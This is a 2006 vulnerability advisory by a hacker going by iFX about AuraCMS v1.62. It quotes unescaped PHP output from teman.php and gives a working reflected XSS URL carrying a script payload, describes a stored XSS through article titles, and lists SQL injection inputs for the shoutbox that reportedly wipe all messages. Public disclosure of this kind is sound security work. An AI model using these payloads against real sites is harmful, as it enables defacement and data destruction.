by : iFX a.k.a inversFX
_______________________________
[ apem-zigzag (at) telkom (dot) net [email concealed] ]
[ inversfx (at) yahoo (dot) com [email concealed] ]
-------------------------------
locate : Indonesia, Jakarta
--------------------------------
date : 29/06/2006
--------------------------------
title : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - arif (at) ayo.kliksini (dot) com [email concealed]
http://www.auracms.tk
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com
--------------------------------
PoC :
--------------------------------------------------------------------
1. in 'teman.php' we can see the code :
.....
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
.....
we found something here, that's variable $judul_artikel
so we can xss from the url :
1st ex:
http://localhost/teman.php?judul_artikel=<script>alert("mati
dah gwa!!!")</script>
2nd ex:
or we can send an artikel to admin and the title had the
XSS code, so when anonymous is
opening the index.php, the script are running.
---------------------------------------------------------------------
2. we found something here that can be delete all
shoutbox message.
as usually we can shout anonymously with fake name, mail,
pesan.
here when I insert
name = ' or ''=' <== old SQL
injection code
mail = test_string <== you can fill it with free mail
address
pesan = ' or ''=' <== old SQL injection code
then all message on it clear amazingly....
----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.tx
t
----------------------------------------------------------------------
sory for my words In English, cuz I often REMED!!!
_________________
/Shout :| |X|
------------------------------------------------------------------------
-------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom
kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius,
||||||||. |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe,
Shock-3d, G4mMa, Big_Red_One } |
------------------------------------------------------------------------
-------------
|OK | Apply | Cancel |
----------------------
========================================================================
================
Simak preview pertandingan piala dunia 2006 di http://telkom.net/pialadunia/
Asah pengetahuanmu tentang Piala Dunia di
http://netkuis.telkom.net/pialadunia/
========================================================================
================
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum